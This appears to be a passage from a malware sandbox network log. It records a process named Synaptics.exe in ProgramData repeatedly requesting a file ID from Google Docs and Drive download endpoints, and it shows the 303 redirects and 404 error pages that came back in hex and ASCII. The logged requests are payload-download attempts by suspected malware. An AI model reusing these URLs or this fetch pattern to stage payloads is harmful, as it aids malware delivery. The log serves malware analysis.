                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:13 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PUq9l4zQOIWRR5xMvQDUGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 6d 46 4f 61 50 48 70 66 6a 77 6e 68 4b 74 4a 4f 35 55 32 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="EmFOaPHpfjwnhKtJO5U2mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      31192.168.2.549764142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:14 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5OdNQT4lZuEo8cQMk_hcJ1-aA2_iEWbjW7jRh-H0d4P7Fej2lKpleZrxPWj6prueBuD8G14lU
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QJhf_BMw94pBrg7RnOCO3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:14 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:14 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 43 73 49 66 6d 54 59 47 74 77 59 4b 6d 5f 45 7a 6e 65 51 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="GCsIfmTYGtwYKm_EzneQwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:14 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      32192.168.2.549766142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Jp3LPVGppGhlvJ9bHd6Jhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      33192.168.2.549765142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:14 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-plBgU1MGCenGNCcVk2lrhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      34192.168.2.549767142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:14 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7klrstWaAIVAR_hsm0jmZROZA-pF8YXAmO3dKJXN-7-zEANOrdPV19-R2l-RHbQsyFCIsMDwU
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lSaWpbEL5-n2JFX2_k8KWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:14 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:14 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 62 51 30 51 6a 75 49 38 4c 6c 48 75 48 35 75 32 77 71 4a 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="bbQ0QjuI8LlHuH5u2wqJ5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:14 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      35192.168.2.549770142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:15 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6YS6OcP-58oIoOTy1-OU39GSZDZ9AcIAhTC5HisoIKfqAEMIXOdeKnP6oPCDEK2ZOd
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-CXqyOhE7v4xNR9mGVzc0bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:15 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:15 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 59 32 6c 59 2d 6c 52 33 73 33 6a 58 4c 37 43 43 4d 52 4a 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="2Y2lY-lR3s3jXL7CCMRJcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:15 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      36192.168.2.549771142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:15 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XgsDdPbZ6vCDzMXhlym6eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      37192.168.2.549772142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
